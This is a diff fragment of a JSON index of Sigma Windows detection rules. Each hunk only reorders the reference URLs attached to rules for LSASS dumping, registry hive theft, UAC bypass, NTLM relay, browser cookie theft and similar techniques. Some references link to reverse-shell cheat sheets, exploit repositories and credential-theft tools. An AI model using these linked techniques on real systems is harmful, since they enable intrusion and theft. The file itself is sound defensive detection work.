 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml"
 ],
 "tags": [
@@ -47895,8 +47895,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
 "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar",
+ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_reflective_assembly_load.yml"
 ],
 "tags": [
@@ -47939,8 +47939,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create",
+ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml"
 ],
@@ -47974,8 +47974,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http",
 "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_char_in_cmd.yml"
 ],
 "tags": [
@@ -47999,8 +47999,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/",
+ "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bginfo.yml"
 ],
 "tags": [
@@ -48050,9 +48050,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/",
 "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1",
 "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py",
+ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml"
 ],
 "tags": [
@@ -48085,8 +48085,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/orange_8361/status/1518970259868626944",
 "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute",
+ "https://twitter.com/orange_8361/status/1518970259868626944",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml"
 ],
 "tags": [
@@ -48110,12 +48110,12 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.joeware.net/freetools/tools/adfind/",
- "https://thedfirreport.com/2020/05/08/adfind-recon/",
 "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
- "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md",
+ "https://www.joeware.net/freetools/tools/adfind/",
 "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
+ "https://thedfirreport.com/2020/05/08/adfind-recon/",
 "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx",
+ "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_adfind.yml"
 ],
 "tags": [
@@ -48194,8 +48194,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/",
 "https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys",
+ "https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml"
 ],
 "tags": [
@@ -48363,8 +48363,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.php.net/manual/en/features.commandline.php",
 "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet",
+ "https://www.php.net/manual/en/features.commandline.php",
 "https://www.revshells.com/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml"
 ],
@@ -48528,8 +48528,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/",
- "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/",
 "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s",
+ "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml"
 ],
 "tags": [
@@ -48587,8 +48587,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/",
 "https://github.com/klinix5/InstallerFileTakeOver",
+ "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_lpe_cve_2021_41379.yml"
 ],
 "tags": [
@@ -48657,8 +48657,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
 "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings",
+ "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification.yml"
 ],
 "tags": [
@@ -48882,14 +48882,14 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md",
- "https://reaqta.com/2017/12/mavinject-microsoft-injector/",
- "https://github.com/SigmaHQ/sigma/issues/3742",
- "https://twitter.com/Hexacorn/status/776122138063409152",
- "https://twitter.com/gN3mes1s/status/941315826107510784",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
+ "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection",
 "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e",
+ "https://twitter.com/gN3mes1s/status/941315826107510784",
+ "https://reaqta.com/2017/12/mavinject-microsoft-injector/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md",
+ "https://twitter.com/Hexacorn/status/776122138063409152",
+ "https://github.com/SigmaHQ/sigma/issues/3742",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml"
 ],
 "tags": [
@@ -49055,11 +49055,11 @@
 "logsource.product": "windows",
 "refs": [
 "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc",
- "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer",
- "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/",
- "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
 "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner",
+ "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/",
+ "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer",
 "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
+ "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_ip_scanner.yml"
 ],
 "tags": [
@@ -49084,8 +49084,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml",
 "https://twitter.com/med0x2e/status/1520402518685200384",
+ "https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml"
 ],
 "tags": [
@@ -49144,8 +49144,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll",
 "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/",
+ "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml"
 ],
 "tags": [
@@ -49399,8 +49399,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.fortiguard.com/threat-signal-report/4718?s=09",
- "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/",
 "https://lolbas-project.github.io/lolbas/Binaries/Regasm/",
+ "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml"
 ],
 "tags": [
@@ -49433,10 +49433,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/defaultnamehere/cookie_crimes/",
 "https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf",
- "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/",
+ "https://github.com/defaultnamehere/cookie_crimes/",
 "https://github.com/wunderwuzzi23/firefox-cookiemonster",
+ "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browser_remote_debugging.yml"
 ],
 "tags": [
@@ -49469,8 +49469,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.pdq.com/pdq-deploy/",
 "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md",
+ "https://www.pdq.com/pdq-deploy/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdq_deploy.yml"
 ],
 "tags": [
@@ -49517,8 +49517,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406",
 "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel",
+ "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pingback_backdoor.yml"
 ],
 "tags": [
@@ -49576,8 +49576,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bootconf_mod.yml"
 ],
 "tags": [
@@ -49701,8 +49701,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100",
 "https://adsecurity.org/?p=2288",
+ "https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml"
 ],
 "tags": [
@@ -49736,8 +49736,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04",
 "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/",
+ "https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml"
 ],
 "tags": [
@@ -49770,8 +49770,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
 "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings",
+ "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification_set_service.yml"
 ],
 "tags": [
@@ -49795,8 +49795,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
 "https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
+ "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml"
 ],
 "tags": [
@@ -49854,8 +49854,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
- "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime",
+ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml"
 ],
 "tags": [
@@ -49964,9 +49964,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html",
 "https://eqllib.readthedocs.io/en/latest/analytics/1e1ef6be-12fc-11e9-8d76-4d6bb837cda4.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md",
- "https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_dump.yml"
 ],
 "tags": [
@@ -50032,8 +50032,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0",
 "https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4",
+ "https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml"
 ],
 "tags": [
@@ -50099,8 +50099,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100",
 "https://securelist.com/schroedingers-petya/78870/",
+ "https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml"
 ],
 "tags": [
@@ -50151,8 +50151,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/fatedier/frp",
 "https://asec.ahnlab.com/en/38156/",
+ "https://github.com/fatedier/frp",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_frp.yml"
 ],
 "tags": [
@@ -50297,8 +50297,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html",
- "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
 "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation",
+ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_grabbing_sensitive_hives_via_reg.yml"
 ],
@@ -50349,12 +50349,12 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.joeware.net/freetools/tools/adfind/",
- "https://thedfirreport.com/2020/05/08/adfind-recon/",
 "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
- "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md",
+ "https://www.joeware.net/freetools/tools/adfind/",
 "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
+ "https://thedfirreport.com/2020/05/08/adfind-recon/",
 "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx",
+ "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_usage.yml"
 ],
 "tags": [
@@ -50397,11 +50397,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1",
 "https://blog.alyac.co.kr/1901",
- "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/",
- "https://en.wikipedia.org/wiki/Hangul_(word_processor)",
 "https://twitter.com/cyberwar_15/status/1187287262054076416",
+ "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/",
+ "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1",
+ "https://en.wikipedia.org/wiki/Hangul_(word_processor)",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml"
 ],
 "tags": [
@@ -50511,8 +50511,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/kagancapar/status/1515219358234161153",
 "https://github.com/kagancapar/CVE-2022-29072",
+ "https://twitter.com/kagancapar/status/1515219358234161153",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_7zip_cve_2022_29072.yml"
 ],
 "tags": [
@@ -50737,8 +50737,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_service.yml"
 ],
 "tags": [
@@ -50806,8 +50806,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
+ "https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_workflow_compiler.yml"
 ],
 "tags": [
@@ -50883,8 +50883,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains",
 "https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md",
+ "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_w32tm.yml"
 ],
 "tags": [
@@ -51035,8 +51035,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
 "https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/",
+ "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_virtualbox.yml"
 ],
 "tags": [
@@ -51110,9 +51110,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.echotrail.io/insights/search/mshta.exe",
- "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/",
 "https://en.wikipedia.org/wiki/HTML_Application",
+ "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/",
+ "https://www.echotrail.io/insights/search/mshta.exe",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml"
 ],
 "tags": [
@@ -51167,8 +51167,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
 "https://github.com/3proxy/3proxy",
+ "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml"
 ],
 "tags": [
@@ -51203,8 +51203,8 @@
 "refs": [
 "https://twitter.com/d1r4c/status/1279042657508081664",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file",
- "https://curl.se/docs/manpage.html",
 "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76",
+ "https://curl.se/docs/manpage.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml"
 ],
 "tags": [
@@ -51460,9 +51460,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
 "https://guides.lib.umich.edu/c.php?g=282942&p=1885348",
 "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
+ "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_image.yml"
 ],
 "tags": [
@@ -51495,8 +51495,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://redcanary.com/blog/lateral-movement-winrm-wmi/",
 "https://twitter.com/bohops/status/994405551751815170",
+ "https://redcanary.com/blog/lateral-movement-winrm-wmi/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrm_execution.yml"
 ],
 "tags": [
@@ -51530,8 +51530,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md",
 "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml"
 ],
@@ -51556,9 +51556,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://twitter.com/SBousseaden/status/1211636381086339073",
 "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view",
 "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html",
- "https://twitter.com/SBousseaden/status/1211636381086339073",
 "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml"
 ],
@@ -51804,9 +51804,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN",
 "https://twitter.com/jonasLyk/status/1555914501802921984",
 "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/",
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml"
 ],
 "tags": [
@@ -51981,8 +51981,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution",
+ "https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_infdefaultinstall.yml"
 ],
 "tags": [
